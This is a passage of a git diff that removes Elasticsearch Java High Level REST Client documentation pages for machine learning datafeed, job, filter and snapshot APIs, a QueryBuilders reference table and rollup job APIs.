cluster. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Stop datafeeds request - -A +{request}+ object is created referencing any number of non-null `datafeedId` entries. -Wildcards and `_all` are also accepted. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `datafeedId` entries. - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Whether to ignore if a wildcard expression matches no datafeeds. (This includes `_all` string) -<2> If true, the datafeed is stopped forcefully. -<3> Controls the amount of time to wait until a datafeed stops. The default value is 20 seconds. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/update-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/update-data-frame-analytics.asciidoc deleted file mode 100644 index 36db38186dc..00000000000 --- a/docs/java-rest/high-level/ml/update-data-frame-analytics.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ --- -:api: update-data-frame-analytics -:request: UpdateDataFrameAnalyticsRequest -:response: UpdateDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update {dfanalytics-jobs} API - -experimental::[] - -Updates an existing {dfanalytics-job}. -The API accepts an +{request}+ object as a request and returns an +{response}+. - -[id="{upid}-{api}-request"] -==== Update {dfanalytics-jobs} request - -An +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {dfanalytics-job} update to perform - -[id="{upid}-{api}-config"] -==== {dfanalytics-cap} configuration update - -The `DataFrameAnalyticsConfigUpdate` object contains all the details about the {dfanalytics-job} -configuration update and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-update] --------------------------------------------------- -<1> The {dfanalytics-job} ID -<2> The human-readable description -<3> The memory limit for the model created as part of the analysis process -<4> The maximum number of threads to be used by the analysis - -[id="{upid}-{api}-query-config"] - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the updated {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/update-datafeed.asciidoc b/docs/java-rest/high-level/ml/update-datafeed.asciidoc deleted file mode 100644 index b76c009f9cb..00000000000 --- a/docs/java-rest/high-level/ml/update-datafeed.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ --- -:api: update-datafeed -:request: UpdateDatafeedRequest -:response: PutDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update datafeeds API - -Updates a {ml} datafeed in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Update datafeeds request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The updated configuration of the {ml} datafeed - -[id="{upid}-{api}-config"] -==== Updated datafeeds arguments - -A `DatafeedUpdate` requires an existing non-null `datafeedId` and -allows updating various settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> Mandatory, non-null `datafeedId` referencing an existing {ml} datafeed. -<2> Optional, set the datafeed aggregations for data gathering. -<3> Optional, the indices that contain the data to retrieve and feed into the -{anomaly-job}. -<4> Optional, specifies how data searches are split into time chunks. -<5> Optional, the interval at which scheduled queries are made while the -datafeed runs in real time. -<6> Optional, a query to filter the search results by. Defaults to the -`match_all` query. -<7> Optional, the time interval behind real time that data is queried. -<8> Optional, allows the use of script fields. -<9> Optional, the `size` parameter used in the searches. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the updated {ml} datafeed if it has been successfully updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated datafeed. diff --git a/docs/java-rest/high-level/ml/update-filter.asciidoc b/docs/java-rest/high-level/ml/update-filter.asciidoc deleted file mode 100644 index d73560500f1..00000000000 --- a/docs/java-rest/high-level/ml/update-filter.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ --- -:api: update-filter -:request: UpdateFilterRequest -:response: PutFilterResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update filters API - -Updates an existing {ml} filter in the cluster. The API accepts a +{request}+ -object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Update filters request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The id of the existing {ml} filter. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-description] --------------------------------------------------- -<1> The updated description of the {ml} filter. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-add-items] --------------------------------------------------- -<1> The list of items to add to the {ml} filter. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-remove-items] --------------------------------------------------- -<1> The list of items to remove from the {ml} filter. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the updated {ml} filter if it has been successfully updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated `MlFilter`. diff --git a/docs/java-rest/high-level/ml/update-job.asciidoc b/docs/java-rest/high-level/ml/update-job.asciidoc deleted file mode 100644 index 5a2217d0924..00000000000 --- a/docs/java-rest/high-level/ml/update-job.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: update-job -:request: UpdateJobRequest -:response: PutJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update {anomaly-jobs} API - -Provides the ability to update an {anomaly-job}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Update {anomaly-jobs} request - -An +{request}+ object gets created with a `JobUpdate` object. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing a `JobUpdate` object. - -==== Optional arguments - -The `JobUpdate` object has many optional arguments with which to update an -existing {anomaly-job}. An existing, non-null `jobId` must be referenced in its -creation. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-options] --------------------------------------------------- -<1> Mandatory, non-null `jobId` referencing an existing {anomaly-job}. -<2> Updated description. -<3> Updated analysis limits. -<4> Updated background persistence interval. -<5> Updated analysis config's categorization filters. -<6> Updated detectors through the `JobUpdate.DetectorUpdate` object. -<7> Updated group membership. -<8> Updated result retention. -<9> Updated model plot configuration. -<10> Updated model snapshot retention setting. -<11> Updated custom settings. -<12> Updated renormalization window. - -Included with these options are specific optional `JobUpdate.DetectorUpdate` updates. -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-detector-options] --------------------------------------------------- -<1> The index of the detector. `O` means unknown. -<2> The optional description of the detector. -<3> The `DetectionRule` rules that apply to this detector. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update {anomaly-jobs} response - -A +{response}+ contains the updated `Job` object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getResponse()` returns the updated `Job` object. diff --git a/docs/java-rest/high-level/ml/update-model-snapshot.asciidoc b/docs/java-rest/high-level/ml/update-model-snapshot.asciidoc deleted file mode 100644 index a38462e1503..00000000000 --- a/docs/java-rest/high-level/ml/update-model-snapshot.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ --- -:api: update-model-snapshot -:request: UpdateModelSnapshotRequest -:response: UpdateModelSnapshotResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update model snapshots API - -Updates a {ml} model snapshot. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Update model snapshots request - -A +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `jobId` and `snapshotId` -values. - -==== Optional arguments - -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-description] --------------------------------------------------- -<1> The updated description of the {ml} model snapshot. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-retain] --------------------------------------------------- -<1> The updated `retain` property of the {ml} model snapshot. - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update model snapshots response - -A +{response}+ contains an acknowledgement of the update request and the full representation of the updated `ModelSnapshot` object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> An acknowledgement of the request. -<2> The updated `ModelSnapshot`. diff --git a/docs/java-rest/high-level/query-builders.asciidoc b/docs/java-rest/high-level/query-builders.asciidoc deleted file mode 100644 index a2706e7ad8a..00000000000 --- a/docs/java-rest/high-level/query-builders.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[java-rest-high-query-builders]] -=== Building Queries - -This page lists all the available search queries with their corresponding `QueryBuilder` class name and helper method name in the -`QueryBuilders` utility class. - -:query-ref: {elasticsearch-javadoc}/org/elasticsearch/index/query -:mapper-extras-ref: {mapper-extras-client-javadoc}/org/elasticsearch/index/query -:parentjoin-ref: {parent-join-client-javadoc}/org/elasticsearch/join/query -:percolate-ref: {percolator-client-javadoc}/org/elasticsearch/percolator - -==== Match All Query -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-match-all-query.html[Match All] | {query-ref}/MatchAllQueryBuilder.html[MatchAllQueryBuilder] | {query-ref}/QueryBuilders.html#matchAllQuery--[QueryBuilders.matchAllQuery()] -|====== - -==== Full Text Queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-match-query.html[Match] | {query-ref}/MatchQueryBuilder.html[MatchQueryBuilder] | {query-ref}/QueryBuilders.html#matchQuery-java.lang.String-java.lang.Object-[QueryBuilders.matchQuery()] -| {ref}/query-dsl-match-query-phrase.html[Match Phrase] | {query-ref}/MatchPhraseQueryBuilder.html[MatchPhraseQueryBuilder] | {query-ref}/QueryBuilders.html#matchPhraseQuery-java.lang.String-java.lang.Object-[QueryBuilders.matchPhraseQuery()] -| {ref}/query-dsl-match-query-phrase-prefix.html[Match Phrase Prefix] | {query-ref}/MatchPhrasePrefixQueryBuilder.html[MatchPhrasePrefixQueryBuilder] | {query-ref}/QueryBuilders.html#matchPhrasePrefixQuery-java.lang.String-java.lang.Object-[QueryBuilders.matchPhrasePrefixQuery()] -| {ref}/query-dsl-multi-match-query.html[Multi Match] | {query-ref}/MultiMatchQueryBuilder.html[MultiMatchQueryBuilder] | {query-ref}/QueryBuilders.html#multiMatchQuery-java.lang.Object-java.lang.String\…-[QueryBuilders.multiMatchQuery()] -| {ref}/query-dsl-common-terms-query.html[Common Terms] | {query-ref}/CommonTermsQueryBuilder.html[CommonTermsQueryBuilder] | {query-ref}/QueryBuilders.html#commonTermsQuery-java.lang.String-java.lang.Object-[QueryBuilders.commonTermsQuery()] -| {ref}/query-dsl-query-string-query.html[Query String] | {query-ref}/QueryStringQueryBuilder.html[QueryStringQueryBuilder] | {query-ref}/QueryBuilders.html#queryStringQuery-java.lang.String-[QueryBuilders.queryStringQuery()] -| {ref}/query-dsl-simple-query-string-query.html[Simple Query String] | {query-ref}/SimpleQueryStringBuilder.html[SimpleQueryStringBuilder] | {query-ref}/QueryBuilders.html#simpleQueryStringQuery-java.lang.String-[QueryBuilders.simpleQueryStringQuery()] -|====== - -==== Term-level queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-term-query.html[Term] | {query-ref}/TermQueryBuilder.html[TermQueryBuilder] | {query-ref}/QueryBuilders.html#termQuery-java.lang.String-java.lang.String-[QueryBuilders.termQuery()] -| {ref}/query-dsl-terms-query.html[Terms] | {query-ref}/TermsQueryBuilder.html[TermsQueryBuilder] | {query-ref}/QueryBuilders.html#termsQuery-java.lang.String-java.util.Collection-[QueryBuilders.termsQuery()] -| {ref}/query-dsl-range-query.html[Range] | {query-ref}/RangeQueryBuilder.html[RangeQueryBuilder] | {query-ref}/QueryBuilders.html#rangeQuery-java.lang.String-[QueryBuilders.rangeQuery()] -| {ref}/query-dsl-exists-query.html[Exists] | {query-ref}/ExistsQueryBuilder.html[ExistsQueryBuilder] | {query-ref}/QueryBuilders.html#existsQuery-java.lang.String-[QueryBuilders.existsQuery()] -| {ref}/query-dsl-prefix-query.html[Prefix] | {query-ref}/PrefixQueryBuilder.html[PrefixQueryBuilder] | {query-ref}/QueryBuilders.html#prefixQuery-java.lang.String-java.lang.String-[QueryBuilders.prefixQuery()] -| {ref}/query-dsl-wildcard-query.html[Wildcard] | {query-ref}/WildcardQueryBuilder.html[WildcardQueryBuilder] | {query-ref}/QueryBuilders.html#wildcardQuery-java.lang.String-java.lang.String-[QueryBuilders.wildcardQuery()] -| {ref}/query-dsl-regexp-query.html[Regexp] | {query-ref}/RegexpQueryBuilder.html[RegexpQueryBuilder] | {query-ref}/QueryBuilders.html#regexpQuery-java.lang.String-java.lang.String-[QueryBuilders.regexpQuery()] -| {ref}/query-dsl-fuzzy-query.html[Fuzzy] | {query-ref}/FuzzyQueryBuilder.html[FuzzyQueryBuilder] | {query-ref}/QueryBuilders.html#fuzzyQuery-java.lang.String-java.lang.String-[QueryBuilders.fuzzyQuery()] -| {ref}/query-dsl-type-query.html[Type] | {query-ref}/TypeQueryBuilder.html[TypeQueryBuilder] | {query-ref}/QueryBuilders.html#typeQuery-java.lang.String-[QueryBuilders.typeQuery()] -| {ref}/query-dsl-ids-query.html[Ids] | {query-ref}/IdsQueryBuilder.html[IdsQueryBuilder] | {query-ref}/QueryBuilders.html#idsQuery--[QueryBuilders.idsQuery()] -|====== - -==== Compound queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-constant-score-query.html[Constant Score] | {query-ref}/ConstantScoreQueryBuilder.html[ConstantScoreQueryBuilder] | {query-ref}/QueryBuilders.html#constantScoreQuery-org.elasticsearch.index.query.QueryBuilder-[QueryBuilders.constantScoreQuery()] -| {ref}/query-dsl-bool-query.html[Bool] | {query-ref}/BoolQueryBuilder.html[BoolQueryBuilder] | {query-ref}/QueryBuilders.html#boolQuery--[QueryBuilders.boolQuery()] -| {ref}/query-dsl-dis-max-query.html[Dis Max] | {query-ref}/DisMaxQueryBuilder.html[DisMaxQueryBuilder] | {query-ref}/QueryBuilders.html#disMaxQuery--[QueryBuilders.disMaxQuery()] -| {ref}/query-dsl-function-score-query.html[Function Score] | {query-ref}/functionscore/FunctionScoreQueryBuilder.html[FunctionScoreQueryBuilder] | {query-ref}/QueryBuilders.html#functionScoreQuery-org.elasticsearch.index.query.functionscore.FunctionScoreQueryBuilder.FilterFunctionBuilder:A-[QueryBuilders.functionScoreQuery()] -| {ref}/query-dsl-boosting-query.html[Boosting] | {query-ref}/BoostingQueryBuilder.html[BoostingQueryBuilder] | {query-ref}/QueryBuilders.html#boostingQuery-org.elasticsearch.index.query.QueryBuilder-org.elasticsearch.index.query.QueryBuilder-[QueryBuilders.boostingQuery()] -|====== - -==== Joining queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-nested-query.html[Nested] | {query-ref}/NestedQueryBuilder.html[NestedQueryBuilder] | {query-ref}/QueryBuilders.html#nestedQuery-java.lang.String-org.elasticsearch.index.query.QueryBuilder-org.apache.lucene.search.join.ScoreMode-[QueryBuilders.nestedQuery()] -| {ref}/query-dsl-has-child-query.html[Has Child] | {parentjoin-ref}/HasChildQueryBuilder.html[HasChildQueryBuilder] | -| {ref}/query-dsl-has-parent-query.html[Has Parent] | {parentjoin-ref}/HasParentQueryBuilder.html[HasParentQueryBuilder] | -| {ref}/query-dsl-parent-id-query.html[Parent Id] | {parentjoin-ref}/ParentIdQueryBuilder.html[ParentIdQueryBuilder] | -|====== - -==== Geo queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-geo-shape-query.html[GeoShape] | {query-ref}/GeoShapeQueryBuilder.html[GeoShapeQueryBuilder] | {query-ref}/QueryBuilders.html#geoShapeQuery-java.lang.String-java.lang.String-java.lang.String-[QueryBuilders.geoShapeQuery()] -| {ref}/query-dsl-geo-bounding-box-query.html[Geo Bounding Box] | {query-ref}/GeoBoundingBoxQueryBuilder.html[GeoBoundingBoxQueryBuilder] | {query-ref}/QueryBuilders.html#geoBoundingBoxQuery-java.lang.String-[QueryBuilders.geoBoundingBoxQuery()] -| {ref}/query-dsl-geo-distance-query.html[Geo Distance] | {query-ref}/GeoDistanceQueryBuilder.html[GeoDistanceQueryBuilder] | {query-ref}/QueryBuilders.html#geoDistanceQuery-java.lang.String-[QueryBuilders.geoDistanceQuery()] -| {ref}/query-dsl-geo-polygon-query.html[Geo Polygon] | {query-ref}/GeoPolygonQueryBuilder.html[GeoPolygonQueryBuilder] | {query-ref}/QueryBuilders.html#geoPolygonQuery-java.lang.String-java.util.List-[QueryBuilders.geoPolygonQuery()] -|====== - -==== Specialized queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-mlt-query.html[More Like This] | {query-ref}/MoreLikeThisQueryBuilder.html[MoreLikeThisQueryBuilder] | {query-ref}/QueryBuilders.html#moreLikeThisQuery-org.elasticsearch.index.query.MoreLikeThisQueryBuilder.Item:A-[QueryBuilders.moreLikeThisQuery()] -| {ref}/query-dsl-script-query.html[Script] | {query-ref}/ScriptQueryBuilder.html[ScriptQueryBuilder] | {query-ref}/QueryBuilders.html#scriptQuery-org.elasticsearch.script.Script-[QueryBuilders.scriptQuery()] -| {ref}/query-dsl-percolate-query.html[Percolate] | {percolate-ref}/PercolateQueryBuilder.html[PercolateQueryBuilder] | -| {ref}/query-dsl-wrapper-query.html[Wrapper] | {query-ref}/WrapperQueryBuilder.html[WrapperQueryBuilder] | {query-ref}/QueryBuilders.html#wrapperQuery-java.lang.String-[QueryBuilders.wrapperQuery()] -| {ref}/query-dsl-rank-feature-query.html[Rank Feature] | {mapper-extras-ref}/RankFeatureQuery.html[RankFeatureQueryBuilder] | -| {ref}/query-dsl-pinned-query.html[Pinned Query] | The PinnedQueryBuilder is packaged as part of the xpack-core module | -|====== - -==== Span queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-span-term-query.html[Span Term] | {query-ref}/SpanTermQueryBuilder.html[SpanTermQueryBuilder] | {query-ref}/QueryBuilders.html#spanTermQuery-java.lang.String-double-[QueryBuilders.spanTermQuery()] -| {ref}/query-dsl-span-multi-term-query.html[Span Multi Term] | {query-ref}/SpanMultiTermQueryBuilder.html[SpanMultiTermQueryBuilder] | {query-ref}/QueryBuilders.html#spanMultiTermQueryBuilder-org.elasticsearch.index.query.MultiTermQueryBuilder-[QueryBuilders.spanMultiTermQueryBuilder()] -| {ref}/query-dsl-span-first-query.html[Span First] | {query-ref}/SpanFirstQueryBuilder.html[SpanFirstQueryBuilder] | {query-ref}/QueryBuilders.html#spanFirstQuery-org.elasticsearch.index.query.SpanQueryBuilder-int-[QueryBuilders.spanFirstQuery()] -| {ref}/query-dsl-span-near-query.html[Span Near] | {query-ref}/SpanNearQueryBuilder.html[SpanNearQueryBuilder] | {query-ref}/QueryBuilders.html#spanNearQuery-org.elasticsearch.index.query.SpanQueryBuilder-int-[QueryBuilders.spanNearQuery()] -| {ref}/query-dsl-span-or-query.html[Span Or] | {query-ref}/SpanOrQueryBuilder.html[SpanOrQueryBuilder] | {query-ref}/QueryBuilders.html#spanOrQuery-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanOrQuery()] -| {ref}/query-dsl-span-not-query.html[Span Not] | {query-ref}/SpanNotQueryBuilder.html[SpanNotQueryBuilder] | {query-ref}/QueryBuilders.html#spanNotQuery-org.elasticsearch.index.query.SpanQueryBuilder-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanNotQuery()] -| {ref}/query-dsl-span-containing-query.html[Span Containing] | {query-ref}/SpanContainingQueryBuilder.html[SpanContainingQueryBuilder] | {query-ref}/QueryBuilders.html#spanContainingQuery-org.elasticsearch.index.query.SpanQueryBuilder-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanContainingQuery()] -| {ref}/query-dsl-span-within-query.html[Span Within] | {query-ref}/SpanWithinQueryBuilder.html[SpanWithinQueryBuilder] | {query-ref}/QueryBuilders.html#spanWithinQuery-org.elasticsearch.index.query.SpanQueryBuilder-org.elasticsearch.index.query.SpanQueryBuilder-[QueryBuilders.spanWithinQuery()] -| {ref}/query-dsl-span-field-masking-query.html[Span Field Masking] | {query-ref}/FieldMaskingSpanQueryBuilder.html[FieldMaskingSpanQueryBuilder] | {query-ref}/QueryBuilders.html#fieldMaskingSpanQuery-org.elasticsearch.index.query.SpanQueryBuilder-java.lang.String-[QueryBuilders.fieldMaskingSpanQuery()] -|====== diff --git a/docs/java-rest/high-level/rollup/delete_job.asciidoc b/docs/java-rest/high-level/rollup/delete_job.asciidoc deleted file mode 100644 index 22b8787799a..00000000000 --- a/docs/java-rest/high-level/rollup/delete_job.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: rollup-delete-job -:request: DeleteRollupJobRequest -:response: DeleteRollupJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Rollup Job API - -experimental::[] - -[id="{upid}-{api}-request"] -==== Request - -The Delete Rollup Job API allows you to delete a job by ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the job to delete. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete command was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete job request was received. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/rollup/get_job.asciidoc b/docs/java-rest/high-level/rollup/get_job.asciidoc deleted file mode 100644 index 5ed65ebfaec..00000000000 --- a/docs/java-rest/high-level/rollup/get_job.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-rollup-get-job]] -=== Get Rollup Job API - -experimental::[] - -The Get Rollup Job API can be used to get one or all rollup jobs from the -cluster. It accepts a `GetRollupJobRequest` object as a request and returns -a `GetRollupJobResponse`. - -[[java-rest-high-x-pack-rollup-get-rollup-job-request]] -==== Get Rollup Job Request - -A `GetRollupJobRequest` can be built without any parameters to get all of the -rollup jobs or with a job name to get a single job: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-request] --------------------------------------------------- -<1> Gets all jobs. -<2> Gets `job_1`. - -[[java-rest-high-x-pack-rollup-get-rollup-job-execution]] -==== Execution - -The Get Rollup Job API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-rollup-get-rollup-job-response]] -==== Response - -The returned `GetRollupJobResponse` includes a `JobWrapper` per returned job -which contains the configuration of the job, the job's current status, and -statistics about the job's past execution. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-response] --------------------------------------------------- -<1> We only asked for a single job - -[[java-rest-high-x-pack-rollup-get-rollup-job-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-execute-async] --------------------------------------------------- -<1> The `GetRollupJobRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetRollupJobResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-get-rollup-job-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/get_rollup_caps.asciidoc b/docs/java-rest/high-level/rollup/get_rollup_caps.asciidoc deleted file mode 100644 index f4c9240f781..00000000000 --- a/docs/java-rest/high-level/rollup/get_rollup_caps.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ --- -:api: rollup-get-rollup-caps -:request: GetRollupCapsRequest -:response: GetRollupCapsResponse --- -[role="xpack"] -[id="{upid}-x-pack-{api}"] -=== Get Rollup Capabilities API - -experimental::[] - -The Get Rollup Capabilities API allows the user to query a target index pattern (`logstash-*`, etc) -and determine if there are any rollup jobs that are/were configured to rollup that pattern. -The API accepts a `GetRollupCapsRequest` object as a request and returns a `GetRollupCapsResponse`. - -[id="{upid}-x-pack-{api}-request"] -==== Get Rollup Capabilities Request - -A +{request}+ requires a single parameter: the target index or index pattern (e.g. `logstash-*`): - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-request] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-execution"] -==== Execution - -The Get Rollup Capabilities API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-response"] -==== Response - -The returned +{response}+ holds lists and maps of values which correspond to the capabilities -of the target index/index pattern (what jobs were configured for the pattern, where the data is stored, what -aggregations are available, etc). It provides essentially the same data as the original job configuration, -just presented in a different manner. - -For example, if we had created a job with the following config: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-setup] --------------------------------------------------- - -The +{response}+ object would contain the same information, laid out in a slightly different manner: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-response] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-async"] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/get_rollup_index_caps.asciidoc b/docs/java-rest/high-level/rollup/get_rollup_index_caps.asciidoc deleted file mode 100644 index 2e08409d1e2..00000000000 --- a/docs/java-rest/high-level/rollup/get_rollup_index_caps.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ --- -:api: rollup-get-rollup-index-caps -:request: GetRollupIndexCapsRequest -:response: GetRollupIndexCapsResponse --- -[role="xpack"] -[id="{upid}-x-pack-{api}"] -=== Get Rollup Index Capabilities API - -experimental::[] - -The Get Rollup Index Capabilities API allows the user to determine if a concrete index or index pattern contains -stored rollup jobs and data. If it contains data stored from rollup jobs, the capabilities of those jobs -are returned. The API accepts a `GetRollupIndexCapsRequest` object as a request and returns a `GetRollupIndexCapsResponse`. - -[id="{upid}-x-pack-{api}-request"] -==== Get Rollup Index Capabilities Request - -A +{request}+ requires a single parameter: the target index or index pattern (e.g. `rollup-foo`): - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-request] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-execution"] -==== Execution - -The Get Rollup Index Capabilities API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-response"] -==== Response - -The returned +{response}+ holds lists and maps of values which correspond to the capabilities -of the rollup index/index pattern (what jobs are stored in the index, their 